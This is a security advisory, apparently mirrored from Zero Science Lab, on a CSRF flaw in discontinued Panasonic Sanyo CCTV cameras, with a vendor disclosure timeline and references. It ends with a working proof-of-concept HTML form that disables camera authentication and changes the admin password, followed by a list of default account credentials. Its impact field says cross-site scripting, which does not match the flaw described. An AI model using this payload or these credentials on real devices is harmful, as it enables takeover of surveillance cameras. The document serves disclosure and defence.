Lucene search

K
zeroscienceGjoko KrsticZSL-2021-5659
HistoryJul 30, 2021 - 12:00 a.m.

Panasonic Sanyo CCTV Network Camera 2.03-0x CSRF Disable Authentication / Change Password

2021-07-3000:00:00
Gjoko Krstic
zeroscience.mk
774

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

0.001 Low

EPSS

Percentile

26.7%

Title: Panasonic Sanyo CCTV Network Camera 2.03-0x CSRF Disable Authentication / Change Password
Advisory ID: ZSL-2021-5659
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 30.07.2021

Summary

SANYO network camera and network optional board with the latest H.264 compression technology provide the optimum surveillance applications with high quality real time moving image at low bandwidth. Simultaneous stream of H.264 and JPEG data and also COAX video out to provide flexible solution for digital and analogue combined system.

Description

The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. These actions can be exploited to perform authentication detriment and account password change with administrative privileges if a logged-in user visits a malicious web site.

Vendor

Panasonic Corporation - <https://www.panasonic.com>
SANYO Electric Co., Ltd. - <https://www.sanyo-av.com>

Affected Version

Model: VCC-HD5600P, FrmVer: 2.03-06 (110315-00), SubVer: 1.01-00 (100528-00)
Model: VDC-HD3300P, FrmVer: 2.03-08 (111222-00), SubVer: 1.01-00 (100528-00)
Model: VDC-HD3300P, FrmVer: 1.02-05 (101005-07), SubVer: 1.01-00 (100528-00)
Model: VCC-HD3300, FrmVer: 2.03-02 (110318-00A), SubVer: 1.01-00 (100528-00)
Model: VDC-HD3100P, FrmVer: 2.03-00 (110204-02), SubVer: 1.01-00 (100528-00)
Model: VCC-HD2100P, FrmVer: 2.03-02 (110318-00A), SubVer: 1.01-00 (100528-00)

Tested On

Embedded Linux
CGI

Vendor Status

[13.07.2021] Vulnerability discovered.
[14.07.2021] Panasonic PSIRT contacted.
[15.07.2021] Vendor responds asking more details.
[15.07.2021] Sent details to the vendor.
[20.07.2021] Asked vendor for status update.
[21.07.2021] Vendor sent details to development team. Will reply after any status update.
[27.07.2021] No status update from the vendor.
[28.07.2021] Asked vendor for status update.
[30.07.2021] Vendor responds, the Sanyo brand ended in 2012 and the security cameras were supported until 2019. We are not able to address the reported issues. The websites for Sanyo branded security cameras will be shutdown in September 2021.
[30.07.2021] Replied to the vendor.
[30.07.2021] Public security advisory released.

PoC

panasonic_sanyo_csrf.html

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://sol.panasonic.biz/security/sanyo/index.html&gt;
[2] <https://eww.cnw.panasonic.co.jp/security/g/sanyo/index.html&gt;
[3] <https://cxsecurity.com/issue/WLB-2021080003&gt;
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/206533&gt;
[5] <https://packetstormsecurity.com/files/163714/&gt;
[6] <https://www.exploit-db.com/exploits/50172&gt;
[7] <https://vulners.com/cve/CVE-2022-4621&gt;
[8] <https://nvd.nist.gov/vuln/detail/CVE-2022-4621&gt;
[9] <https://www.cisa.gov/uscert/ics/advisories/icsa-23-012-04&gt;

Changelog

[30.07.2021] - Initial release
[02.08.2021] - Added reference [3], [4], [5] and [6]
[10.01.2023] - Added reference [7] and [8]
[26.01.2023] - Added reference [9]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<!--

Panasonic Sanyo CCTV Network Camera 2.03-0x CSRF Disable Authentication / Change Password


Vendor: Panasonic Corporation | SANYO Electric Co., Ltd.
Product web page: https://www.panasonic.com
                  https://www.sanyo-av.com
                  https://panasonic.net/sanyo/cs/index.html

Affected version: Model: VCC-HD5600P, FrmVer: 2.03-06 (110315-00),  SubVer: 1.01-00 (100528-00)
                  Model: VDC-HD3300P, FrmVer: 2.03-08 (111222-00),  SubVer: 1.01-00 (100528-00)
                  Model: VDC-HD3300P, FrmVer: 1.02-05 (101005-07),  SubVer: 1.01-00 (100528-00)
                  Model: VCC-HD3300,  FrmVer: 2.03-02 (110318-00A), SubVer: 1.01-00 (100528-00)
                  Model: VDC-HD3100P, FrmVer: 2.03-00 (110204-02),  SubVer: 1.01-00 (100528-00)
                  Model: VCC-HD2100P, FrmVer: 2.03-02 (110318-00A), SubVer: 1.01-00 (100528-00)

Summary: SANYO network camera and network optional board with the
latest H.264 compression technology provide the optimum surveillance
applications with high quality real time moving image at low bandwidth.
Simultaneous stream of H.264 and JPEG data and also COAX video out
to provide flexible solution for digital and analogue combined system.

Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. These actions can be exploited to perform authentication
detriment and account password change with administrative privileges if
a logged-in user visits a malicious web site.

Tested on: Embedded Linux
           CGI


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5659
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5659.php


13.07.2021

--><html><body><p>[CSRF]
[Anonymous user log in = ON]
orororororororororororororor
  [Change admin password]


  </p>
<form action="http://10.0.0.3:82/cgi-bin/user_registration.cgi" method="POST">
<input name="anonymous_sw" type="hidden" value="1"/> <!--Disable authentication-->
<input name="admin1_pw" type="hidden" value="Ztream0017"/> <!--Change admin password-->
<input name="admin2_pw" type="hidden" value="******"/>
<input name="admin3_pw" type="hidden" value="******"/>
<input name="operator_pw" type="hidden" value="********"/>
<input name="guest_pw" type="hidden" value="*****"/>
<input type="submit" value="Push"/>
</form>
<!--
[Defaults]
admin:admin
admin2:admin2
admin3:admin3
operator:operator
operator2:operator2
guest:guest
-->
</body></html>

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

0.001 Low

EPSS

Percentile

26.7%

Related for ZSL-2021-5659